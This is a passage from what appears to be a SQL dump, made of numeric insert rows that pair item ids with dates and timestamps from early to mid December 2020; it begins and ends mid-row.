12:40:56'),(9440,3243,1,'2020-12-02','2020-12-02 12:49:42'),(9441,3245,1,'2020-12-02','2020-12-02 12:54:05'),(9442,3247,1,'2020-12-02','2020-12-02 13:10:35'),(9443,1544,1,'2020-12-02','2020-12-02 13:22:06'),(9444,2309,1,'2020-12-02','2020-12-02 13:30:00'),(9445,2159,1,'2020-12-02','2020-12-02 13:38:07'),(9446,2609,1,'2020-12-02','2020-12-02 14:00:05'),(9447,2457,1,'2020-12-02','2020-12-02 14:05:44'),(9448,1614,1,'2020-12-02','2020-12-02 14:10:30'),(9449,1600,1,'2020-12-02','2020-12-02 15:07:54'),(9450,1608,1,'2020-12-02','2020-12-02 15:27:27'),(9451,2769,1,'2020-12-02','2020-12-02 16:35:26'),(9452,91,1,'2020-12-02','2020-12-02 16:36:45'),(9453,1586,1,'2020-12-02','2020-12-02 16:55:55'),(9454,87,1,'2020-12-02','2020-12-02 17:21:52'),(9455,91,1,'2020-12-02','2020-12-02 17:22:15'),(9456,1718,1,'2020-12-02','2020-12-02 17:22:51'),(9457,84,1,'2020-12-02','2020-12-02 17:24:18'),(9458,91,1,'2020-12-02','2020-12-02 17:24:33'),(9459,3249,1,'2020-12-02','2020-12-02 17:25:44'),(9460,3097,1,'2020-12-02','2020-12-02 17:27:17'),(9461,91,1,'2020-12-02','2020-12-02 17:28:05'),(9462,570,1,'2020-12-02','2020-12-02 19:30:46'),(9463,3127,1,'2020-12-02','2020-12-02 20:04:45'),(9464,1600,1,'2020-12-02','2020-12-02 20:51:15'),(9465,2309,1,'2020-12-02','2020-12-02 21:05:12'),(9466,1604,1,'2020-12-02','2020-12-02 22:12:31'),(9467,2309,1,'2020-12-03','2020-12-03 00:05:26'),(9468,2609,1,'2020-12-03','2020-12-03 00:48:56'),(9469,1600,1,'2020-12-03','2020-12-03 01:00:34'),(9470,1604,1,'2020-12-03','2020-12-03 01:11:51'),(9471,1586,1,'2020-12-03','2020-12-03 01:48:33'),(9472,2309,1,'2020-12-03','2020-12-03 04:22:09'),(9473,1588,1,'2020-12-03','2020-12-03 04:52:28'),(9474,2159,1,'2020-12-03','2020-12-03 05:02:27'),(9475,570,1,'2020-12-03','2020-12-03 05:22:59'),(9476,1614,1,'2020-12-03','2020-12-03 05:53:14'),(9477,1588,1,'2020-12-03','2020-12-03 06:03:15'),(9478,1586,1,'2020-12-03','2020-12-03 06:12:59'),(9479,1604,1,'2020-12-03','2020-12-03 06:53:26'),(9480,2309,1,'2020-12-03','2020-12-03 08:38:05'),(9481,91,1,'2020-12-03','2020-12-03 09:01:56'),(9482,1586,1,'2020-12-03','2020-12-03 09:02:08'),(9483,2159,1,'2020-12-03','2020-12-03 09:20:46'),(9484,1600,1,'2020-12-03','2020-12-03 09:38:48'),(9485,2769,1,'2020-12-03','2020-12-03 09:58:46'),(9486,91,1,'2020-12-03','2020-12-03 10:25:35'),(9487,2769,1,'2020-12-03','2020-12-03 10:40:33'),(9488,91,1,'2020-12-03','2020-12-03 10:54:31'),(9489,2410,1,'2020-12-03','2020-12-03 11:02:44'),(9490,1586,1,'2020-12-03','2020-12-03 11:09:29'),(9491,3087,1,'2020-12-03','2020-12-03 11:26:44'),(9492,2904,1,'2020-12-03','2020-12-03 11:27:15'),(9493,1586,1,'2020-12-03','2020-12-03 11:34:51'),(9494,1604,1,'2020-12-03','2020-12-03 11:49:25'),(9495,3107,1,'2020-12-03','2020-12-03 12:49:05'),(9496,2609,1,'2020-12-03','2020-12-03 12:49:42'),(9497,91,1,'2020-12-03','2020-12-03 13:04:17'),(9498,3102,1,'2020-12-03','2020-12-03 13:04:57'),(9499,108,1,'2020-12-03','2020-12-03 13:05:59'),(9500,1594,1,'2020-12-03','2020-12-03 13:20:46'),(9501,1594,1,'2020-12-03','2020-12-03 13:22:19'),(9502,72,1,'2020-12-03','2020-12-03 13:33:07'),(9503,2904,1,'2020-12-03','2020-12-03 13:33:47'),(9504,76,1,'2020-12-03','2020-12-03 13:34:01'),(9505,72,1,'2020-12-03','2020-12-03 13:34:12'),(9506,89,1,'2020-12-03','2020-12-03 13:35:48'),(9507,84,1,'2020-12-03','2020-12-03 13:37:39'),(9508,80,1,'2020-12-03','2020-12-03 13:40:13'),(9509,91,1,'2020-12-03','2020-12-03 13:41:21'),(9510,1709,1,'2020-12-03','2020-12-03 13:49:46'),(9511,1600,1,'2020-12-03','2020-12-03 13:49:55'),(9512,68,1,'2020-12-03','2020-12-03 13:51:56'),(9513,3245,1,'2020-12-03','2020-12-03 13:52:15'),(9514,1699,1,'2020-12-03','2020-12-03 13:53:42'),(9515,2309,1,'2020-12-03','2020-12-03 13:59:35'),(9516,1588,1,'2020-12-03','2020-12-03 14:19:33'),(9517,1588,1,'2020-12-03','2020-12-03 14:30:05'),(9518,87,1,'2020-12-03','2020-12-03 14:40:49'),(9519,467,1,'2020-12-03','2020-12-03 14:41:34'),(9520,470,1,'2020-12-03','2020-12-03 14:42:36'),(9521,474,1,'2020-12-03','2020-12-03 14:43:00'),(9522,467,1,'2020-12-03','2020-12-03 14:43:10'),(9523,470,1,'2020-12-03','2020-12-03 14:43:20'),(9524,468,1,'2020-12-03','2020-12-03 14:45:01'),(9525,2159,1,'2020-12-03','2020-12-03 14:59:55'),(9526,2159,1,'2020-12-03','2020-12-03 15:13:02'),(9527,1614,1,'2020-12-03','2020-12-03 15:19:27'),(9528,80,1,'2020-12-03','2020-12-03 15:20:12'),(9529,91,1,'2020-12-03','2020-12-03 15:38:15'),(9530,1614,1,'2020-12-03','2020-12-03 15:40:17'),(9531,3259,1,'2020-12-03','2020-12-03 15:47:01'),(9532,3257,1,'2020-12-03','2020-12-03 15:52:02'),(9533,3253,1,'2020-12-03','2020-12-03 15:58:54'),(9534,3257,1,'2020-12-03','2020-12-03 16:02:39'),(9535,2769,1,'2020-12-03','2020-12-03 16:09:37'),(9536,1586,1,'2020-12-03','2020-12-03 16:10:38'),(9537,3259,1,'2020-12-03','2020-12-03 16:18:08'),(9538,3253,1,'2020-12-03','2020-12-03 16:19:30'),(9539,3261,1,'2020-12-03','2020-12-03 16:19:54'),(9540,3257,1,'2020-12-03','2020-12-03 16:23:55'),(9541,570,1,'2020-12-03','2020-12-03 16:40:32'),(9542,2159,1,'2020-12-03','2020-12-03 17:17:19'),(9543,2309,1,'2020-12-03','2020-12-03 17:40:46'),(9544,3087,1,'2020-12-03','2020-12-03 18:02:23'),(9545,2769,1,'2020-12-03','2020-12-03 20:32:35'),(9546,2769,1,'2020-12-03','2020-12-03 20:58:35'),(9547,2769,1,'2020-12-03','2020-12-03 20:58:43'),(9548,2769,1,'2020-12-03','2020-12-03 20:59:55'),(9549,2769,1,'2020-12-03','2020-12-03 20:59:57'),(9550,3243,1,'2020-12-03','2020-12-03 21:41:16'),(9551,68,1,'2020-12-04','2020-12-04 00:49:56'),(9552,2609,1,'2020-12-04','2020-12-04 01:09:39'),(9553,2309,1,'2020-12-04','2020-12-04 01:19:54'),(9554,1586,1,'2020-12-04','2020-12-04 01:30:00'),(9555,2159,1,'2020-12-04','2020-12-04 02:00:05'),(9556,1600,1,'2020-12-04','2020-12-04 02:40:30'),(9557,2309,1,'2020-12-04','2020-12-04 04:21:35'),(9558,2159,1,'2020-12-04','2020-12-04 06:22:51'),(9559,2769,1,'2020-12-04','2020-12-04 06:33:01'),(9560,1604,1,'2020-12-04','2020-12-04 09:04:13'),(9561,3271,1,'2020-12-04','2020-12-04 11:56:41'),(9562,3269,1,'2020-12-04','2020-12-04 12:13:31'),(9563,3267,1,'2020-12-04','2020-12-04 12:45:15'),(9564,3273,1,'2020-12-04','2020-12-04 12:45:19'),(9565,3265,1,'2020-12-04','2020-12-04 12:58:26'),(9566,1600,1,'2020-12-04','2020-12-04 13:03:29'),(9567,3273,1,'2020-12-04','2020-12-04 13:13:57'),(9568,3267,1,'2020-12-04','2020-12-04 13:18:49'),(9569,2309,1,'2020-12-04','2020-12-04 13:21:13'),(9570,3269,1,'2020-12-04','2020-12-04 13:49:45'),(9571,1588,1,'2020-12-04','2020-12-04 14:28:50'),(9572,1724,1,'2020-12-04','2020-12-04 14:38:59'),(9573,2309,1,'2020-12-04','2020-12-04 14:43:27'),(9574,1718,1,'2020-12-04','2020-12-04 14:48:16'),(9575,3263,1,'2020-12-04','2020-12-04 15:07:08'),(9576,3265,1,'2020-12-04','2020-12-04 15:21:57'),(9577,3263,1,'2020-12-04','2020-12-04 16:14:53'),(9578,2989,1,'2020-12-04','2020-12-04 17:38:24'),(9579,80,1,'2020-12-04','2020-12-04 19:43:43'),(9580,80,1,'2020-12-04','2020-12-04 20:22:33'),(9581,68,1,'2020-12-04','2020-12-04 22:01:55'),(9582,486,1,'2020-12-04','2020-12-04 23:56:58'),(9583,2609,1,'2020-12-05','2020-12-05 01:01:55'),(9584,2159,1,'2020-12-05','2020-12-05 01:55:43'),(9585,2309,1,'2020-12-05','2020-12-05 02:06:26'),(9586,3259,1,'2020-12-05','2020-12-05 04:46:34'),(9587,3249,1,'2020-12-05','2020-12-05 04:56:01'),(9588,3251,1,'2020-12-05','2020-12-05 05:15:48'),(9589,80,1,'2020-12-05','2020-12-05 06:42:59'),(9590,80,1,'2020-12-05','2020-12-05 07:36:22'),(9591,80,1,'2020-12-05','2020-12-05 07:36:35'),(9592,3263,1,'2020-12-05','2020-12-05 10:38:00'),(9593,2993,1,'2020-12-05','2020-12-05 10:38:47'),(9594,2751,1,'2020-12-05','2020-12-05 10:42:51'),(9595,2993,1,'2020-12-05','2020-12-05 10:43:17'),(9596,72,1,'2020-12-05','2020-12-05 10:43:36'),(9597,2993,1,'2020-12-05','2020-12-05 10:44:24'),(9598,3263,1,'2020-12-05','2020-12-05 10:44:32'),(9599,84,1,'2020-12-05','2020-12-05 10:44:57'),(9600,3263,1,'2020-12-05','2020-12-05 10:45:19'),(9601,1604,1,'2020-12-05','2020-12-05 12:50:24'),(9602,1586,1,'2020-12-05','2020-12-05 12:53:02'),(9603,1596,1,'2020-12-05','2020-12-05 12:58:34'),(9604,1596,1,'2020-12-05','2020-12-05 13:06:51'),(9605,80,1,'2020-12-05','2020-12-05 13:21:09'),(9606,1596,1,'2020-12-05','2020-12-05 13:22:09'),(9607,1600,1,'2020-12-05','2020-12-05 14:13:55'),(9608,1594,1,'2020-12-05','2020-12-05 14:49:42'),(9609,1606,1,'2020-12-05','2020-12-05 19:32:31'),(9610,1606,1,'2020-12-05','2020-12-05 19:32:35'),(9611,2159,1,'2020-12-05','2020-12-05 19:34:07'),(9612,2309,1,'2020-12-05','2020-12-05 20:16:25'),(9613,1588,1,'2020-12-05','2020-12-05 20:45:31'),(9614,1588,1,'2020-12-05','2020-12-05 20:47:36'),(9615,87,1,'2020-12-05','2020-12-05 20:48:39'),(9616,1588,1,'2020-12-05','2020-12-05 20:49:01'),(9617,91,1,'2020-12-05','2020-12-05 20:49:21'),(9618,1588,1,'2020-12-05','2020-12-05 20:50:10'),(9619,2503,1,'2020-12-06','2020-12-06 00:51:12'),(9620,1600,1,'2020-12-06','2020-12-06 06:10:19'),(9621,1741,1,'2020-12-06','2020-12-06 06:11:12'),(9622,1600,1,'2020-12-06','2020-12-06 06:11:50'),(9623,1588,1,'2020-12-06','2020-12-06 06:47:45'),(9624,1588,1,'2020-12-06','2020-12-06 06:47:50'),(9625,2159,1,'2020-12-06','2020-12-06 07:16:13'),(9626,1600,1,'2020-12-06','2020-12-06 08:07:43'),(9627,1695,1,'2020-12-06','2020-12-06 09:02:22'),(9628,2159,1,'2020-12-06','2020-12-06 12:08:26'),(9629,2751,1,'2020-12-06','2020-12-06 12:54:35'),(9630,2410,1,'2020-12-06','2020-12-06 12:55:12'),(9631,2751,1,'2020-12-06','2020-12-06 13:09:23'),(9632,91,1,'2020-12-06','2020-12-06 19:08:08'),(9633,2457,1,'2020-12-06','2020-12-06 19:39:18'),(9634,2457,1,'2020-12-06','2020-12-06 19:42:09'),(9635,84,1,'2020-12-06','2020-12-06 21:34:56'),(9636,87,1,'2020-12-06','2020-12-06 21:35:10'),(9637,89,1,'2020-12-06','2020-12-06 21:35:25'),(9638,91,1,'2020-12-06','2020-12-06 21:35:41'),(9639,68,1,'2020-12-06','2020-12-06 21:35:58'),(9640,76,1,'2020-12-06','2020-12-06 21:36:12'),(9641,72,1,'2020-12-06','2020-12-06 21:36:32'),(9642,335,1,'2020-12-06','2020-12-06 21:36:46'),(9643,108,1,'2020-12-06','2020-12-06 21:37:01'),(9644,2503,1,'2020-12-06','2020-12-06 21:37:16'),(9645,80,1,'2020-12-06','2020-12-06 21:37:30'),(9646,2904,1,'2020-12-06','2020-12-06 21:37:44'),(9647,487,1,'2020-12-06','2020-12-06 21:38:11'),(9648,474,1,'2020-12-06','2020-12-06 21:38:22'),(9649,473,1,'2020-12-06','2020-12-06 21:38:34'),(9650,1596,1,'2020-12-07','2020-12-07 05:21:00'),(9651,1614,1,'2020-12-07','2020-12-07 06:17:49'),(9652,1774,1,'2020-12-07','2020-12-07 09:13:38'),(9653,89,1,'2020-12-07','2020-12-07 10:11:05'),(9654,1594,1,'2020-12-07','2020-12-07 10:49:15'),(9655,91,1,'2020-12-07','2020-12-07 15:18:19'),(9656,91,1,'2020-12-07','2020-12-07 15:21:22'),(9657,570,1,'2020-12-07','2020-12-07 15:21:44'),(9658,91,1,'2020-12-07','2020-12-07 15:24:51'),(9659,3275,1,'2020-12-07','2020-12-07 16:48:06'),(9660,1604,1,'2020-12-07','2020-12-07 16:56:41'),(9661,3275,1,'2020-12-07','2020-12-07 18:10:59'),(9662,3271,1,'2020-12-07','2020-12-07 18:11:05'),(9663,3273,1,'2020-12-07','2020-12-07 18:11:34'),(9664,3275,1,'2020-12-07','2020-12-07 18:12:26'),(9665,3269,1,'2020-12-07','2020-12-07 18:13:33'),(9666,3265,1,'2020-12-07','2020-12-07 18:15:46'),(9667,3263,1,'2020-12-07','2020-12-07 18:17:06'),(9668,3267,1,'2020-12-07','2020-12-07 18:21:27'),(9669,1600,1,'2020-12-07','2020-12-07 21:27:28'),(9670,486,1,'2020-12-08','2020-12-08 00:09:48'),(9671,76,1,'2020-12-08','2020-12-08 05:53:23'),(9672,80,1,'2020-12-08','2020-12-08 05:53:33'),(9673,68,1,'2020-12-08','2020-12-08 05:53:36'),(9674,108,1,'2020-12-08','2020-12-08 05:53:53'),(9675,91,1,'2020-12-08','2020-12-08 05:54:58'),(9676,3275,1,'2020-12-08','2020-12-08 06:40:33'),(9677,91,1,'2020-12-08','2020-12-08 09:46:37'),(9678,1612,1,'2020-12-08','2020-12-08 09:57:58'),(9679,1544,1,'2020-12-08','2020-12-08 09:58:25'),(9680,1596,1,'2020-12-08','2020-12-08 13:27:21'),(9681,2410,1,'2020-12-08','2020-12-08 17:19:37'),(9682,80,1,'2020-12-08','2020-12-08 17:22:24'),(9683,2309,1,'2020-12-08','2020-12-08 17:30:49'),(9684,2309,1,'2020-12-08','2020-12-08 17:30:54'),(9685,2309,1,'2020-12-08','2020-12-08 17:31:12'),(9686,2309,1,'2020-12-08','2020-12-08 17:32:57'),(9687,1544,1,'2020-12-08','2020-12-08 20:25:38'),(9688,2159,1,'2020-12-08','2020-12-08 22:38:22'),(9689,1774,1,'2020-12-08','2020-12-08 22:40:07'),(9690,1582,1,'2020-12-09','2020-12-09 03:07:18'),(9691,2159,1,'2020-12-09','2020-12-09 03:13:04'),(9692,1604,1,'2020-12-09','2020-12-09 03:28:41'),(9693,1747,1,'2020-12-09','2020-12-09 05:03:23'),(9694,2309,1,'2020-12-09','2020-12-09 05:14:52'),(9695,68,1,'2020-12-09','2020-12-09 06:21:33'),(9696,68,1,'2020-12-09','2020-12-09 06:21:53'),(9697,76,1,'2020-12-09','2020-12-09 06:22:12'),(9698,89,1,'2020-12-09','2020-12-09 06:23:34'),(9699,89,1,'2020-12-09','2020-12-09 06:30:57'),(9700,68,1,'2020-12-09','2020-12-09 09:23:00'),(9701,1586,1,'2020-12-09','2020-12-09 09:26:30'),(9702,1586,1,'2020-12-09','2020-12-09 09:26:57'),(9703,1586,1,'2020-12-09','2020-12-09 09:31:04'),(9704,80,1,'2020-12-09','2020-12-09 09:31:18'),(9705,80,1,'2020-12-09','2020-12-09 09:32:36'),(9706,1614,1,'2020-12-09','2020-12-09 09:48:01'),(9707,335,1,'2020-12-09','2020-12-09 10:37:32'),(9708,3278,1,'2020-12-09','2020-12-09 11:03:16'),(9709,1614,1,'2020-12-09','2020-12-09 11:17:20'),(9710,1612,1,'2020-12-09','2020-12-09 11:18:02'),(9711,1614,1,'2020-12-09','2020-12-09 11:18:12'),(9712,1586,1,'2020-12-09','2020-12-09 11:22:32'),(9713,1604,1,'2020-12-09','2020-12-09 12:09:27'),(9714,1604,1,'2020-12-09','2020-12-09 12:09:32'),(9715,1598,1,'2020-12-09','2020-12-09 12:32:49'),(9716,1586,1,'2020-12-09','2020-12-09 12:56:58'),(9717,2609,1,'2020-12-09','2020-12-09 12:58:39'),(9718,1586,1,'2020-12-09','2020-12-09 13:14:42'),(9719,1614,1,'2020-12-09','2020-12-09 13:45:37'),(9720,2309,1,'2020-12-09','2020-12-09 13:52:32'),(9721,1604,1,'2020-12-09','2020-12-09 14:50:54'),(9722,2159,1,'2020-12-09','2020-12-09 15:02:27'),(9723,1600,1,'2020-12-09','2020-12-09 15:02:38'),(9724,1600,1,'2020-12-09','2020-12-09 15:03:12'),(9725,2309,1,'2020-12-09','2020-12-09 15:03:41'),(9726,3287,1,'2020-12-09','2020-12-09 15:09:39'),(9727,1586,1,'2020-12-09','2020-12-09 15:14:44'),(9728,80,1,'2020-12-09','2020-12-09 15:15:32'),(9729,80,1,'2020-12-09','2020-12-09 15:18:49'),(9730,2309,1,'2020-12-09','2020-12-09 15:37:06'),(9731,3287,1,'2020-12-09','2020-12-09 16:17:41'),(9732,3280,1,'2020-12-09','2020-12-09 16:18:30'),(9733,3278,1,'2020-12-09','2020-12-09 16:20:07'),(9734,3285,1,'2020-12-09','2020-12-09 16:23:19'),(9735,1604,1,'2020-12-09','2020-12-09 16:37:13'),(9736,1614,1,'2020-12-09','2020-12-09 16:55:02'),(9737,2989,1,'2020-12-09','2020-12-09 17:53:55'),(9738,1582,1,'2020-12-09','2020-12-09 18:15:41'),(9739,87,1,'2020-12-09','2020-12-09 18:16:03'),(9740,486,1,'2020-12-09','2020-12-09 18:16:29'),(9741,80,1,'2020-12-09','2020-12-09 18:16:36'),(9742,2769,1,'2020-12-09','2020-12-09 18:40:58'),(9743,1602,1,'2020-12-09','2020-12-09 19:04:43'),(9744,76,1,'2020-12-09','2020-12-09 19:05:13'),(9745,76,1,'2020-12-09','2020-12-09 19:06:11'),(9746,87,1,'2020-12-09','2020-12-09 19:06:34'),(9747,476,1,'2020-12-09','2020-12-09 19:07:31'),(9748,87,1,'2020-12-09','2020-12-09 19:07:47'),(9749,108,1,'2020-12-09','2020-12-09 19:08:05'),(9750,87,1,'2020-12-09','2020-12-09 19:11:32'),(9751,76,1,'2020-12-09','2020-12-09 19:12:30'),(9752,87,1,'2020-12-09','2020-12-09 19:12:34'),(9753,471,1,'2020-12-09','2020-12-09 19:12:38'),(9754,1602,1,'2020-12-09','2020-12-09 19:14:46'),(9755,1604,1,'2020-12-09','2020-12-09 19:24:39'),(9756,1582,1,'2020-12-09','2020-12-09 20:22:14'),(9757,1604,1,'2020-12-09','2020-12-09 20:44:28'),(9758,2309,1,'2020-12-09','2020-12-09 20:47:09'),(9759,1582,1,'2020-12-09','2020-12-09 21:17:23'),(9760,1747,1,'2020-12-09','2020-12-09 21:18:12'),(9761,1582,1,'2020-12-09','2020-12-09 21:19:17'),(9762,1722,1,'2020-12-09','2020-12-09 21:19:58'),(9763,1600,1,'2020-12-09','2020-12-09 21:25:53'),(9764,2159,1,'2020-12-09','2020-12-09 22:29:21'),(9765,3178,1,'2020-12-09','2020-12-09 23:16:02'),(9766,1586,1,'2020-12-10','2020-12-10 00:36:42'),(9767,91,1,'2020-12-10','2020-12-10 00:38:24'),(9768,1600,1,'2020-12-10','2020-12-10 00:54:42'),(9769,3127,1,'2020-12-10','2020-12-10 01:26:07'),(9770,570,1,'2020-12-10','2020-12-10 01:47:11'),(9771,3181,1,'2020-12-10','2020-12-10 04:27:27'),(9772,1604,1,'2020-12-10','2020-12-10 05:27:00'),(9773,1600,1,'2020-12-10','2020-12-10 06:03:44'),(9774,1582,1,'2020-12-10','2020-12-10 06:57:39'),(9775,2609,1,'2020-12-10','2020-12-10 07:07:47'),(9776,1588,1,'2020-12-10','2020-12-10 08:07:29'),(9777,1614,1,'2020-12-10','2020-12-10 08:28:03'),(9778,84,1,'2020-12-10','2020-12-10 09:31:14'),(9779,89,1,'2020-12-10','2020-12-10 09:32:22'),(9780,3004,1,'2020-12-10','2020-12-10 09:33:18'),(9781,3282,1,'2020-12-10','2020-12-10 09:57:06'),(9782,1604,1,'2020-12-10','2020-12-10 10:22:38'),(9783,1600,1,'2020-12-10','2020-12-10 10:50:07'),(9784,72,1,'2020-12-10','2020-12-10 10:58:27'),(9785,68,1,'2020-12-10','2020-12-10 10:58:50'),(9786,76,1,'2020-12-10','2020-12-10 11:00:06'),(9787,3109,1,'2020-12-10','2020-12-10 11:00:13'),(9788,2309,1,'2020-12-10','2020-12-10 11:30:17'),(9789,2309,1,'2020-12-10','2020-12-10 11:30:35'),(9790,3109,1,'2020-12-10','2020-12-10 11:57:26'),(9791,1608,1,'2020-12-10','2020-12-10 11:57:41'),(9792,3282,1,'2020-12-10','2020-12-10 12:12:47'),(9793,1586,1,'2020-12-10','2020-12-10 12:59:45'),(9794,2617,1,'2020-12-10','2020-12-10 13:00:59'),(9795,1586,1,'2020-12-10','2020-12-10 13:05:52'),(9796,1586,1,'2020-12-10','2020-12-10 13:18:20'),(9797,76,1,'2020-12-10','2020-12-10 13:19:12'),(9798,1586,1,'2020-12-10','2020-12-10 13:19:51'),(9799,1586,1,'2020-12-10','2020-12-10 13:21:34'),(9800,1586,1,'2020-12-10','2020-12-10 13:36:01'),(9801,1604,1,'2020-12-10','2020-12-10 13:37:55'),(9802,1604,1,'2020-12-10','2020-12-10 13:38:29'),(9803,3127,1,'2020-12-10','2020-12-10 13:41:02'),(9804,72,1,'2020-12-10','2020-12-10 13:42:29'),(9805,1600,1,'2020-12-10','2020-12-10 14:42:56'),(9806,3030,1,'2020-12-10','2020-12-10 15:14:06'),(9807,2309,1,'2020-12-10','2020-12-10 15:23:24'),(9808,1718,1,'2020-12-10','2020-12-10 15:29:47'),(9809,1594,1,'2020-12-10','2020-12-10 16:03:39'),(9810,2609,1,'2020-12-10','2020-12-10 16:10:31'),(9811,2503,1,'2020-12-10','2020-12-10 18:01:32'),(9812,1718,1,'2020-12-10','2020-12-10 19:39:24'),(9813,1600,1,'2020-12-10','2020-12-10 19:50:49'),(9814,1582,1,'2020-12-10','2020-12-10 21:37:42'),(9815,1594,1,'2020-12-10','2020-12-10 22:18:36'),(9816,1600,1,'2020-12-10','2020-12-10 22:24:42'),(9817,1774,1,'2020-12-10','2020-12-10 22:28:15'),(9818,1774,1,'2020-12-10','2020-12-10 22:30:43'),(9819,1600,1,'2020-12-10','2020-12-10 22:30:51'),(9820,91,1,'2020-12-10','2020-12-10 23:49:50'),(9821,1600,1,'2020-12-11','2020-12-11 01:57:23'),(9822,1602,1,'2020-12-11','2020-12-11 03:05:01'),(9823,1602,1,'2020-12-11','2020-12-11 05:24:00'),(9824,1602,1,'2020-12-11','2020-12-11 05:24:07'),(9825,1730,1,'2020-12-11','2020-12-11 05:38:15'),(9826,1730,1,'2020-12-11','2020-12-11 05:38:18'),(9827,1602,1,'2020-12-11','2020-12-11 05:51:49'),(9828,1728,1,'2020-12-11','2020-12-11 05:52:07'),(9829,1728,1,'2020-12-11','2020-12-11 05:52:08'),(9830,1602,1,'2020-12-11','2020-12-11 05:55:20'),(9831,2297,1,'2020-12-11','2020-12-11 05:55:33'),(9832,2297,1,'2020-12-11','2020-12-11 05:55:35'),(9833,1614,1,'2020-12-11','2020-12-11 08:56:44'),(9834,1600,1,'2020-12-11','2020-12-11 08:58:21'),(9835,1600,1,'2020-12-11','2020-12-11 09:26:45'),(9836,3263,1,'2020-12-11','2020-12-11 17:19:15'),(9837,2309,1,'2020-12-11','2020-12-11 19:55:20'),(9838,1604,1,'2020-12-11','2020-12-11 20:00:48'),(9839,1604,1,'2020-12-11','2020-12-11 20:01:41'),(9840,1600,1,'2020-12-11','2020-12-11 20:15:31'),(9841,1582,1,'2020-12-11','2020-12-11 22:05:43'),(9842,1582,1,'2020-12-11','2020-12-11 22:23:14'),(9843,91,1,'2020-12-11','2020-12-11 22:50:55'),(9844,91,1,'2020-12-11','2020-12-11 22:52:23'),(9845,1598,1,'2020-12-11','2020-12-11 23:12:23'),(9846,3181,1,'2020-12-12','2020-12-12 04:25:27'),(9847,1596,1,'2020-12-12','2020-12-12 13:08:18'),(9848,1596,1,'2020-12-12','2020-12-12 13:08:35'),(9849,3240,1,'2020-12-12','2020-12-12 13:30:16'),(9850,2159,1,'2020-12-12','2020-12-12 14:20:49'),(9851,2309,1,'2020-12-12','2020-12-12 16:13:51'),(9852,2309,1,'2020-12-12','2020-12-12 18:35:26'),(9853,1612,1,'2020-12-12','2020-12-12 21:41:39'),(9854,1592,1,'2020-12-13','2020-12-13 02:24:49'),(9855,80,1,'2020-12-13','2020-12-13 02:26:56'),(9856,1592,1,'2020-12-13','2020-12-13 02:28:25'),(9857,2609,1,'2020-12-13','2020-12-13 07:32:40'),(9858,1614,1,'2020-12-13','2020-12-13 13:36:01'),(9859,76,1,'2020-12-13','2020-12-13 13:39:57'),(9860,1614,1,'2020-12-13','2020-12-13 13:41:35'),(9861,1614,1,'2020-12-13','2020-12-13 13:41:45'),(9862,1614,1,'2020-12-13','2020-12-13 13:44:12'),(9863,1596,1,'2020-12-13','2020-12-13 15:26:06'),(9864,3278,1,'2020-12-13','2020-12-13 17:54:35'),(9865,91,1,'2020-12-13','2020-12-13 18:28:36'),(9866,1606,1,'2020-12-13','2020-12-13 18:39:23'),(9867,1582,1,'2020-12-13','2020-12-13 18:56:56'),(9868,2813,1,'2020-12-13','2020-12-13 19:26:09'),(9869,76,1,'2020-12-13','2020-12-13 20:49:10'),(9870,76,1,'2020-12-13','2020-12-13 20:49:44'),(9871,1606,1,'2020-12-13','2020-12-13 20:49:47'),(9872,2309,1,'2020-12-13','2020-12-13 23:38:05'),(9873,80,1,'2020-12-13','2020-12-13 23:48:26'),(9874,3251,1,'2020-12-14','2020-12-14 00:38:00'),(9875,2309,1,'2020-12-14','2020-12-14 00:38:14'),(9876,3251,1,'2020-12-14','2020-12-14 00:38:54'),(9877,1604,1,'2020-12-14','2020-12-14 00:58:14'),(9878,2457,1,'2020-12-14','2020-12-14 01:18:16'),(9879,91,1,'2020-12-14','2020-12-14 01:58:18'),(9880,1600,1,'2020-12-14','2020-12-14 02:28:14'),(9881,2609,1,'2020-12-14','2020-12-14 03:42:14'),(9882,2609,1,'2020-12-14','2020-12-14 03:42:39'),(9883,2609,1,'2020-12-14','2020-12-14 03:43:02'),(9884,2809,1,'2020-12-14','2020-12-14 04:38:23'),(9885,91,1,'2020-12-14','2020-12-14 10:23:38'),(9886,2457,1,'2020-12-14','2020-12-14 11:35:16'),(9887,1582,1,'2020-12-14','2020-12-14 11:53:05'),(9888,1602,1,'2020-12-14','2020-12-14 13:48:48'),(9889,1602,1,'2020-12-14','2020-12-14 13:49:25'),(9890,2297,1,'2020-12-14','2020-12-14 13:54:13'),(9891,1602,1,'2020-12-14','2020-12-14 13:58:23'),(9892,1606,1,'2020-12-14','2020-12-14 14:48:24'),(9893,2309,1,'2020-12-14','2020-12-14 15:25:33'),(9894,1604,1,'2020-12-14','2020-12-14 16:26:33'),(9895,2775,1,'2020-12-14','2020-12-14 16:44:41'),(9896,2775,1,'2020-12-14','2020-12-14 16:45:15'),(9897,1594,1,'2020-12-14','2020-12-14 17:58:09'),(9898,2457,1,'2020-12-14','2020-12-14 18:00:14'),(9899,1600,1,'2020-12-14','2020-12-14 20:20:36'),(9900,2804,1,'2020-12-14','2020-12-14 20:45:53'),(9901,2309,1,'2020-12-14','2020-12-14 21:05:24'),(9902,1612,1,'2020-12-14','2020-12-14 23:01:57'),(9903,2457,1,'2020-12-15','2020-12-15 00:55:52'),(9904,2609,1,'2020-12-15','2020-12-15 01:15:44'),(9905,1718,1,'2020-12-15','2020-12-15 01:55:30'),(9906,1586,1,'2020-12-15','2020-12-15 02:40:35'),(9907,91,1,'2020-12-15','2020-12-15 02:41:30'),(9908,1586,1,'2020-12-15','2020-12-15 02:44:00'),(9909,1718,1,'2020-12-15','2020-12-15 06:15:44'),(9910,1718,1,'2020-12-15','2020-12-15 06:26:12'),(9911,1586,1,'2020-12-15','2020-12-15 09:00:29'),(9912,2410,1,'2020-12-15','2020-12-15 09:48:40'),(9913,2609,1,'2020-12-15','2020-12-15 10:06:37'),(9914,91,1,'2020-12-15','2020-12-15 10:28:08'),(9915,1586,1,'2020-12-15','2020-12-15 11:15:20'),(9916,1606,1,'2020-12-15','2020-12-15 12:10:13'),(9917,1606,1,'2020-12-15','2020-12-15 12:15:46'),(9918,1600,1,'2020-12-15','2020-12-15 12:25:15'),(9919,1604,1,'2020-12-15','2020-12-15 12:54:42'),(9920,1606,1,'2020-12-15','2020-12-15 14:01:24'),(9921,1586,1,'2020-12-15','2020-12-15 14:07:55'),(9922,68,1,'2020-12-15','2020-12-15 14:18:30'),(9923,1604,1,'2020-12-15','2020-12-15 17:52:28'),(9924,2159,1,'2020-12-15','2020-12-15 17:55:53'),(9925,1604,1,'2020-12-15','2020-12-15 17:56:07'),(9926,2159,1,'2020-12-15','2020-12-15 